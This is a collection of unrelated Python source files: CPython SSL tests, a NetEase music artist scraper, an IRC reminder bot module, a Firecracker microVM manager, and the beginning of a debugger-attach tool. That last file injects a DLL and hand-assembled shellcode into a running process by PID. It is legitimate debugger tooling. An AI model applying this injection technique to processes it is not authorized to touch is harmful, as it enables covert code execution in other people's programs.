(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
pa_wangyi_singer.py
|
# 爬取网页云音乐 所有歌手/团队名字 和 链接
import json
import gevent
import requests
import threading
from lxml import etree
def request_url(url):
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
}
response = requests.get(url, headers=headers)
content = response.content.decode('utf-8')
tree = etree.HTML(content)
return tree
def worker(singer_type, type_href):
url_root = 'https://music.163.com'
singer_list = []
for j in range(65, 91): # 65 91
singer_type_url_page = url_root + type_href + '&initial={}'.format(j)
singer_tree = request_url(singer_type_url_page)
singer_a_list = singer_tree.xpath(
'//ul[@id="m-artist-box"]/li//a[@class="nm nm-icn f-thide s-fc0"] | //ul[@id="m-artist-box"]/li[@class="sml"]/a')
for a in singer_a_list:
singer_info = {}
singer_info['url'] = url_root + a.xpath('./@href')[0].strip()
singer_info['name'] = None
if a.xpath('./text()'):
singer_info['name'] = a.xpath('./text()')[0].strip()
singer_list.append(singer_info)
data[singer_type] = singer_list
# print(data)
def task(singer_type_list, type_href_list):
gevent_list = []
for i in range(len(singer_type_list)):
g = gevent.spawn(worker, *(singer_type_list[i], type_href_list[i]))
gevent_list.append(g)
gevent.joinall(gevent_list)
def main(tree):
info_list = tree.xpath('//div[@class="blk"]')
threading_list = []
for info in info_list:
singer_type_list = info.xpath('.//a/text()')
type_href_list = info.xpath('.//a/@href')
t = threading.Thread(target=task, args=(singer_type_list, type_href_list))
threading_list.append(t)
t.start()
for t in threading_list:
t.join()
# json_str = json.dumps(data, ensure_ascii=False)
# with open('nsjjka.txt', mode='w', encoding='utf-8') as f:
# f.write(json_str)
with open('wanyi_singer.json', mode='w', encoding='utf-8') as fp:
json.dump(data, fp, ensure_ascii=False, indent=4)
if __name__ == '__main__':
data = {}
url = 'https://music.163.com/discover/artist'
tree = request_url(url)
main(tree)
|
remind.py
|
# coding=utf8
"""
remind.py - Willie Reminder Module
Copyright 2011, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://willie.dftba.net
"""
from __future__ import unicode_literals
import os
import re
import time
import threading
import collections
import codecs
from datetime import datetime
from willie.module import commands, example, NOLIMIT
import willie.tools
from willie.tools.time import get_timezone, format_time
try:
import pytz
except:
pytz = None
def filename(self):
name = self.nick + '-' + self.config.host + '.reminders.db'
return os.path.join(self.config.dotdir, name)
def load_database(name):
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
t = int(float(unixtime)) # WTFs going on here?
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in willie.tools.iteritems(data):
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
def setup(bot):
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
@commands('in')
@example('.in 3h45m Go to class')
def remind(bot, trigger):
"""Gives you a reminder in the given amount of time."""
duration = 0
message = filter(None, re.split('(\d+(?:\.\d+)? ?(?:(?i)' + periods + ')) ?',
trigger.group(2))[1:])
reminder = ''
stop = False
for piece in message:
grp = re.match('(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
factor = scaling.get(grp.group(2).lower(), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand the input.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
timezone = get_timezone(
bot.db, bot.config, None, trigger.nick, trigger.sender)
create_reminder(bot, trigger, duration, reminder, timezone)
@commands('at')
@example('.at 13:47 Do your homework!')
def at(bot, trigger):
"""
Gives you a reminder at the given time. Takes hh:mm:ssTimezone
message. Timezone is any timezone Willie takes elsewhere; the best choices
are those from the tzdb; a list of valid options is available at
http://dft.ba/-tz . The seconds and timezone are optional.
"""
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand your input.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if pytz:
timezone = get_timezone(bot.db, bot.config, tz,
trigger.nick, trigger.sender)
if not timezone:
timezone = 'UTC'
now = datetime.now(pytz.timezone(timezone))
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second),
tzinfo=now.tzinfo)
timediff = at_time - now
else:
if tz and tz.upper() != 'UTC':
bot.reply("I don't have timzeone support installed.")
return NOLIMIT
now = datetime.now()
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second))
timediff = at_time - now
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, 'UTC')
def create_reminder(bot, trigger, duration, message, tz):
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
remind_at = datetime.utcfromtimestamp(t)
timef = format_time(bot.db, bot.config, tz, trigger.nick,
trigger.sender, remind_at)
bot.reply('Okay, will remind at %s' % timef)
else:
bot.reply('Okay, will remind in %s secs' % duration)
|
firecracker_microvm.py
|
import asyncio
import dataclasses
import logging
from dataclasses import dataclass, field
from enum import Enum
from multiprocessing import Process, set_start_method
from os import system
from os.path import isfile, exists
from typing import Optional, Dict, List
import msgpack
try:
import psutil as psutil
except ImportError:
psutil = None
from aiohttp import ClientResponseError
from aleph_message.models import ProgramContent
from aleph_message.models.program import MachineResources, Encoding
from firecracker.config import (
BootSource,
Drive,
MachineConfig,
FirecrackerConfig,
Vsock,
NetworkInterface,
)
from firecracker.microvm import MicroVM, setfacl
from firecracker.models import FilePath
from guest_api.__main__ import run_guest_api
from ..conf import settings
from ..storage import get_code_path, get_runtime_path, get_data_path, get_volume_path
logger = logging.getLogger(__name__)
set_start_method("spawn")
def load_file_content(path: FilePath) -> bytes:
if path:
with open(path, "rb") as fd:
return fd.read()
else:
return b""
class ResourceDownloadError(ClientResponseError):
"""An error occurred while downloading a VM resource file"""
def __init__(self, error: ClientResponseError):
super().__init__(
request_info=error.request_info,
history=error.history,
status=error.status,
message=error.message,
headers=error.headers,
)
class Interface(str, Enum):
asgi = "asgi"
executable = "executable"
@dataclass
class Volume:
mount: str
device: str
read_only: bool
@dataclass
class HostVolume:
mount: str
path_on_host: str
read_only: bool
@dataclass
class ConfigurationPayload:
code: bytes
encoding: Encoding
entrypoint: str
input_data: bytes
interface: Interface
vm_hash: str
ip: Optional[str] = None
route: Optional[str] = None
dns_servers: List[str] = field(default_factory=list)
volumes: List[Volume] = field(default_factory=list)
variables: Optional[Dict[str, str]] = None
def as_msgpack(self) -> bytes:
return msgpack.dumps(dataclasses.asdict(self), use_bin_type=True)
@dataclass
class ConfigurationResponse:
success: bool
error: Optional[str] = None
traceback: Optional[str] = None
@dataclass
class RunCodePayload:
scope: Dict
def as_msgpack(self) -> bytes:
return msgpack.dumps(dataclasses.asdict(self), use_bin_type=True)
class AlephFirecrackerResources:
message_content: ProgramContent
kernel_image_path: FilePath
code_path: FilePath
code_encoding: Encoding
code_entrypoint: str
rootfs_path: FilePath
volumes: List[HostVolume]
volume_paths: Dict[str, FilePath]
data_path: Optional[FilePath]
namespace: str
def __init__(self, message_content: ProgramContent, namespace: str):
self.message_content = message_content
self.code_encoding = message_content.code.encoding
self.code_entrypoint = message_content.code.entrypoint
self.namespace = namespace
def to_dict(self):
return self.__dict__
async def download_kernel(self):
# Assumes kernel is already present on the host
self.kernel_image_path = settings.LINUX_PATH
assert isfile(self.kernel_image_path)
async def download_code(self):
code_ref: str = self.message_content.code.ref
try:
self.code_path = await get_code_path(code_ref)
except ClientResponseError as error:
raise ResourceDownloadError(error)
assert isfile(self.code_path)
async def download_runtime(self):
runtime_ref: str = self.message_content.runtime.ref
try:
self.rootfs_path = await get_runtime_path(runtime_ref)
except ClientResponseError as error:
raise ResourceDownloadError(error)
assert isfile(self.rootfs_path), f"Runtime not found on {self.rootfs_path}"
async def download_data(self):
if self.message_content.data:
data_ref: str = self.message_content.data.ref
try:
self.data_path = await get_data_path(data_ref)
except ClientResponseError as error:
raise ResourceDownloadError(error)
assert isfile(self.data_path)
else:
self.data_path = None
async def download_volumes(self):
volumes = []
# TODO: Download in parallel
for volume in self.message_content.volumes:
volumes.append(
HostVolume(
mount=volume.mount,
path_on_host=(
await get_volume_path(volume=volume, namespace=self.namespace)
),
read_only=volume.is_read_only(),
)
)
self.volumes = volumes
async def download_all(self):
await asyncio.gather(
self.download_kernel(),
self.download_code(),
self.download_runtime(),
self.download_volumes(),
self.download_data(),
)
class VmSetupError(Exception):
pass
class AlephFirecrackerVM:
vm_id: int
vm_hash: str
resources: AlephFirecrackerResources
enable_console: bool
enable_networking: bool
hardware_resources: MachineResources
fvm: MicroVM = None
guest_api_process: Optional[Process] = None
def __init__(
self,
vm_id: int,
vm_hash: str,
resources: AlephFirecrackerResources,
enable_networking: bool = False,
enable_console: Optional[bool] = None,
hardware_resources: MachineResources = MachineResources(),
):
self.vm_id = vm_id
self.vm_hash = vm_hash
self.resources = resources
self.enable_networking = enable_networking and settings.ALLOW_VM_NETWORKING
if enable_console is None:
enable_console = settings.PRINT_SYSTEM_LOGS
self.enable_console = enable_console
self.hardware_resources = hardware_resources
def to_dict(self):
if self.fvm.proc and psutil:
p = psutil.Process(self.fvm.proc.pid)
pid_info = {
"status": p.status(),
"create_time": p.create_time(),
"cpu_times": p.cpu_times(),
"cpu_percent": p.cpu_percent(),
"memory_info": p.memory_info(),
"io_counters": p.io_counters(),
"open_files": p.open_files(),
"connections": p.connections(),
"num_threads": p.num_threads(),
"num_ctx_switches": p.num_ctx_switches(),
}
else:
pid_info = None
return {
"process": pid_info,
**self.__dict__,
}
async def setup(self):
logger.debug("setup started")
await setfacl()
fvm = MicroVM(
vm_id=self.vm_id,
firecracker_bin_path=settings.FIRECRACKER_PATH,
use_jailer=settings.USE_JAILER,
jailer_bin_path=settings.JAILER_PATH,
init_timeout=settings.INIT_TIMEOUT,
)
fvm.prepare_jailer()
config = FirecrackerConfig(
boot_source=BootSource(
kernel_image_path=FilePath(
fvm.enable_kernel(self.resources.kernel_image_path)
),
boot_args=BootSource.args(enable_console=self.enable_console),
),
drives=[
Drive(
drive_id="rootfs",
path_on_host=FilePath(
fvm.enable_rootfs(self.resources.rootfs_path)
),
is_root_device=True,
is_read_only=True,
),
]
+ (
[fvm.enable_drive(self.resources.code_path)]
if self.resources.code_encoding == Encoding.squashfs
else []
)
+ [
fvm.enable_drive(volume.path_on_host, read_only=volume.read_only)
for volume in self.resources.volumes
],
machine_config=MachineConfig(
vcpu_count=self.hardware_resources.vcpus,
mem_size_mib=self.hardware_resources.memory,
),
vsock=Vsock(),
network_interfaces=[
NetworkInterface(
iface_id="eth0",
host_dev_name=await fvm.create_network_interface(
interface=settings.NETWORK_INTERFACE),
)
]
if self.enable_networking
else [],
)
logger.debug(config.json(by_alias=True, exclude_none=True, indent=4))
try:
await fvm.start(config)
logger.debug("setup done")
self.fvm = fvm
except Exception:
await fvm.teardown()
raise
async def start(self):
logger.debug(f"starting vm {self.vm_id}")
if not self.fvm:
raise ValueError("No VM found. Call setup() before start()")
fvm = self.fvm
if self.enable_console:
fvm.start_printing_logs()
await fvm.wait_for_init()
logger.debug(f"started fvm {self.vm_id}")
async def configure(self):
"""Configure the VM by sending configuration info to it's init"""
input_data: bytes = load_file_content(self.resources.data_path)
interface = (
Interface.asgi
if ":" in self.resources.code_entrypoint
else Interface.executable
)
volumes: List[Volume]
if self.resources.code_encoding == Encoding.squashfs:
code = b""
volumes = [Volume(mount="/opt/code", device="vdb", read_only=True)] + [
Volume(
mount=volume.mount,
device=self.fvm.drives[index + 1].drive_id,
read_only=volume.read_only,
)
for index, volume in enumerate(self.resources.volumes)
]
else:
code: bytes = load_file_content(self.resources.code_path)
volumes = [
Volume(
mount=volume.mount,
device=self.fvm.drives[index].drive_id,
read_only=volume.read_only,
)
for index, volume in enumerate(self.resources.volumes)
]
reader, writer = await asyncio.open_unix_connection(path=self.fvm.vsock_path)
config = ConfigurationPayload(
ip=self.fvm.guest_ip if self.enable_networking else None,
route=self.fvm.host_ip if self.enable_console else None,
dns_servers=settings.DNS_NAMESERVERS,
code=code,
encoding=self.resources.code_encoding,
entrypoint=self.resources.code_entrypoint,
input_data=input_data,
interface=interface,
vm_hash=self.vm_hash,
volumes=volumes,
variables=self.resources.message_content.variables,
)
payload = config.as_msgpack()
length = f"{len(payload)}\n".encode()
writer.write(b"CONNECT 52\n" + length + payload)
await writer.drain()
await reader.readline() # Ignore the acknowledgement from the socket
response_raw = await reader.read(1000_000)
response = ConfigurationResponse(**msgpack.loads(response_raw, raw=False))
if response.success is False:
logger.exception(response.traceback)
raise VmSetupError(response.error)
async def start_guest_api(self):
logger.debug(f"starting guest API for {self.vm_id}")
vsock_path = f"{self.fvm.vsock_path}_53"
vm_hash = self.vm_hash
self.guest_api_process = Process(
target=run_guest_api, args=(vsock_path, vm_hash)
)
self.guest_api_process.start()
while not exists(vsock_path):
await asyncio.sleep(0.01)
system(f"chown jailman:jailman {vsock_path}")
logger.debug(f"started guest API for {self.vm_id}")
async def stop_guest_api(self):
if self.guest_api_process:
self.guest_api_process.terminate()
async def teardown(self):
if self.fvm:
await self.fvm.teardown()
await self.stop_guest_api()
async def run_code(
self,
scope: dict = None,
):
logger.debug("running code")
scope = scope or {}
reader, writer = await asyncio.open_unix_connection(path=self.fvm.vsock_path)
payload = RunCodePayload(scope=scope)
writer.write(b"CONNECT 52\n" + payload.as_msgpack())
await writer.drain()
ack: bytes = await reader.readline()
logger.debug(f"ack={ack.decode()}")
logger.debug("waiting for VM response")
response: bytes = await reader.read()
logger.debug("cleaning VM resources")
writer.close()
await writer.wait_closed()
return response
|
add_code_to_python_process.py
|
r'''
Copyright: Brainwy Software Ltda.
License: EPL.
=============
Works for Windows relying on a fork of winappdbg which works in py2/3 (at least for the part we're interested in).
See: https://github.com/fabioz/winappdbg (py3 branch).
Note that the official branch for winappdbg is: https://github.com/MarioVilas/winappdbg, which should be used when it works in Py3.
A private copy is added here to make deployment easier, but changes should always be done upstream first.
Works for Linux relying on gdb.
Limitations:
============
Linux:
------
1. It possible that ptrace is disabled: /etc/sysctl.d/10-ptrace.conf
Note that even enabling it in /etc/sysctl.d/10-ptrace.conf (i.e.: making the
ptrace_scope=0), it's possible that we need to run the application that'll use ptrace (or
gdb in this case) as root (so, we must sudo the python which'll run this module).
2. It currently doesn't work in debug builds (i.e.: python_d)
Other implementations:
- pyrasite.com:
GPL
Windows/linux (in Linux it also uses gdb to connect -- although specifics are different as we use a dll to execute
code with other threads stopped). It's Windows approach is more limited because it doesn't seem to deal properly with
Python 3 if threading is disabled.
- https://github.com/google/pyringe:
Apache v2.
Only linux/Python 2.
- http://pytools.codeplex.com:
Apache V2
Windows Only (but supports mixed mode debugging)
Our own code relies heavily on a part of it: http://pytools.codeplex.com/SourceControl/latest#Python/Product/PyDebugAttach/PyDebugAttach.cpp
to overcome some limitations of attaching and running code in the target python executable on Python 3.
See: attach.cpp
Linux: References if we wanted to use a pure-python debugger:
https://bitbucket.org/haypo/python-ptrace/
http://stackoverflow.com/questions/7841573/how-to-get-an-error-message-for-errno-value-in-python
Jugaad:
https://www.defcon.org/images/defcon-19/dc-19-presentations/Jakhar/DEFCON-19-Jakhar-Jugaad-Linux-Thread-Injection.pdf
https://github.com/aseemjakhar/jugaad
Something else (general and not Python related):
- http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces
Other references:
- https://github.com/haypo/faulthandler
- http://nedbatchelder.com/text/trace-function.html
- https://github.com/python-git/python/blob/master/Python/sysmodule.c (sys_settrace)
- https://github.com/python-git/python/blob/master/Python/ceval.c (PyEval_SetTrace)
- https://github.com/python-git/python/blob/master/Python/thread.c (PyThread_get_key_value)
To build the dlls needed on windows, visual studio express 13 was used (see compile_dll.bat)
See: attach_pydevd.py to attach the pydev debugger to a running python process.
'''
# Note: to work with nasm compiling asm to code and decompiling to see asm with shellcode:
# x:\nasm\nasm-2.07-win32\nasm-2.07\nasm.exe
# nasm.asm&x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe -b arch nasm
import ctypes
import os
import struct
import subprocess
import sys
import time
SHOW_DEBUG_INFO = 0
def stderr_write(message):
sys.stderr.write(message)
sys.stderr.write("\n")
def debug(message):
if SHOW_DEBUG_INFO > 0:
stderr_write(message)
class AutoExit(object):
def __init__(self, on_exit):
self.on_exit = on_exit
def __enter__(self):
pass
def __exit__(self, *args):
self.on_exit()
class GenShellCodeHelper(object):
def __init__(self, is_64):
from winappdbg import compat
self.is_64 = is_64
self._code = []
if not is_64:
self._translations = {
'push esi': compat.b('\x56'),
'push eax': compat.b('\x50'),
'push ebp': compat.b('\x55'),
'push ebx': compat.b('\x53'),
'pop esi': compat.b('\x5E'),
'pop eax': compat.b('\x58'),
'pop ebp': compat.b('\x5D'),
'pop ebx': compat.b('\x5B'),
'mov esi': compat.b('\xBE'),
'mov eax': compat.b('\xB8'),
'mov ebp': compat.b('\xBD'),
'mov ebx': compat.b('\xBB'),
'call ebp': compat.b('\xFF\xD5'),
'call eax': compat.b('\xFF\xD0'),
'call ebx': compat.b('\xFF\xD3'),
'mov ebx,eax': compat.b('\x89\xC3'),
'mov eax,ebx': compat.b('\x89\xD8'),
'mov ebp,esp': compat.b('\x89\xE5'),
'mov esp,ebp': compat.b('\x89\xEC'),
'push dword': compat.b('\x68'),
'mov ebp,eax': compat.b('\x89\xC5'),
'mov eax,ebp': compat.b('\x89\xE8'),
'ret': compat.b('\xc3'),
}
else:
# Translate 64 bits
self._translations = {
'push rsi': compat.b('\x56'),
'push rax': compat.b('\x50'),
'push rbp': compat.b('\x55'),
'push rbx': compat.b('\x53'),
'push rsp': compat.b('\x54'),
'push rdi': compat.b('\x57'),
'pop rsi': compat.b('\x5E'),
'pop rax': compat.b('\x58'),
'pop rbp': compat.b('\x5D'),
'pop rbx': compat.b('\x5B'),
'pop rsp': compat.b('\x5C'),
'pop rdi': compat.b('\x5F'),
'mov rsi': compat.b('\x48\xBE'),
'mov rax': compat.b('\x48\xB8'),
'mov rbp': compat.b('\x48\xBD'),
'mov rbx': compat.b('\x48\xBB'),
'mov rdi': compat.b('\x48\xBF'),
'mov rcx': compat.b('\x48\xB9'),
'mov rdx': compat.b('\x48\xBA'),
'call rbp': compat.b('\xFF\xD5'),
'call rax': compat.b('\xFF\xD0'),
'call rbx': compat.b('\xFF\xD3'),
'mov rbx,rax': compat.b('\x48\x89\xC3'),
'mov rax,rbx': compat.b('\x48\x89\xD8'),
'mov rbp,rsp': compat.b('\x48\x89\xE5'),
'mov rsp,rbp': compat.b('\x48\x89\xEC'),
'mov rcx,rbp': compat.b('\x48\x89\xE9'),
'mov rbp,rax': compat.b('\x48\x89\xC5'),
'mov rax,rbp': compat.b('\x48\x89\xE8'),
'mov rdi,rbp': compat.b('\x48\x89\xEF'),
'ret': compat.b('\xc3'),
}
def push_addr(self, addr):
self._code.append(self.translate('push dword'))
self._code.append(addr)
def push(self, register):
self._code.append(self.translate('push %s' % register))
return AutoExit(lambda: self.pop(register))
def pop(self, register):
self._code.append(self.translate('pop %s' % register))
def mov_to_register_addr(self, register, addr):
self._code.append(self.translate('mov %s' % register))
self._code.append(addr)
def mov_register_to_from(self, register_to, register_from):
self._code.append(self.translate('mov %s,%s' % (register_to, register_from)))
def call(self, register):
self._code.append(self.translate('call %s' % register))
def preserve_stack(self):
self.mov_register_to_from('ebp', 'esp')
return AutoExit(lambda: self.restore_stack())
def restore_stack(self):
self.mov_register_to_from('esp', 'ebp')
def ret(self):
self._code.append(self.translate('ret'))
def get_code(self):
from winappdbg import compat
return compat.b('').join(self._code)
def translate(self, code):
return self._translations[code]
def pack_address(self, address):
if self.is_64:
return struct.pack('<q', address)
else:
return struct.pack('<L', address)
def convert(self, code):
'''
Note:
If the shellcode starts with '66' controls, it needs to be changed to add [BITS 32] or
[BITS 64] to the start.
To use:
convert("""
55
53
50
BDE97F071E
FFD5
BDD67B071E
FFD5
5D
5B
58
C3
""")
'''
code = code.replace(' ', '')
lines = []
for l in code.splitlines(False):
lines.append(l)
code = ''.join(lines) # Remove new lines
return code.decode('hex')
def resolve_label(process, label):
for i in range(3):
try:
address = process.resolve_label(label)
assert address
return address
except:
try:
process.scan_modules()
except:
pass
if i == 2:
raise
time.sleep(2)
def is_python_64bit():
return (struct.calcsize('P') == 8)
def is_mac():
import platform
return platform.system() == 'Darwin'
def run_python_code_windows(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
from winappdbg import compat
from winappdbg.process import Process
if not isinstance(python_code, compat.bytes):
python_code = compat.b(python_code)
process = Process(pid)
bits = process.get_bits()
is_64 = bits == 64
if is_64 != is_python_64bit():
raise RuntimeError("The architecture of the Python used to connect doesn't match the architecture of the target.\n"
"Target 64 bits: %s\n"
"Current Python 64 bits: %s" % (is_64, is_python_64bit()))
debug('Connecting to %s bits target' % (bits,))
assert resolve_label(process, compat.b('PyGILState_Ensure'))
filedir = os.path.dirname(__file__)
if is_64:
suffix = 'amd64'
else:
suffix = 'x86'
target_dll = os.path.join(filedir, 'attach_%s.dll' % suffix)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
debug('Injecting dll')
process.inject_dll(target_dll.encode('mbcs'))
debug('Dll injected')
process.scan_modules()
attach_func = resolve_label(process, compat.b('AttachAndRunPythonCode'))
assert attach_func
debug('Allocating code in target process')
code_address = process.malloc(len(python_code))
assert code_address
debug('Writing code in target process')
process.write(code_address, python_code)
debug('Allocating return value memory in target process')
return_code_address = process.malloc(ctypes.sizeof(ctypes.c_int))
assert return_code_address
CONNECT_DEBUGGER = 2
startup_info = 0
if show_debug_info:
SHOW_DEBUG_INFO = 1
startup_info |= SHOW_DEBUG_INFO # Uncomment to show debug info
if connect_debugger_tracing:
startup_info |= CONNECT_DEBUGGER
process.write_int(return_code_address, startup_info)
helper = GenShellCodeHelper(is_64)
if is_64:
# Interesting read: http://msdn.microsoft.com/en-us/library/ms235286.aspx
# Overview of x64 Calling Conventions (for windows: Linux is different!)
# Register Usage: http://msdn.microsoft.com/en-us/library/9z1stfyw.aspx
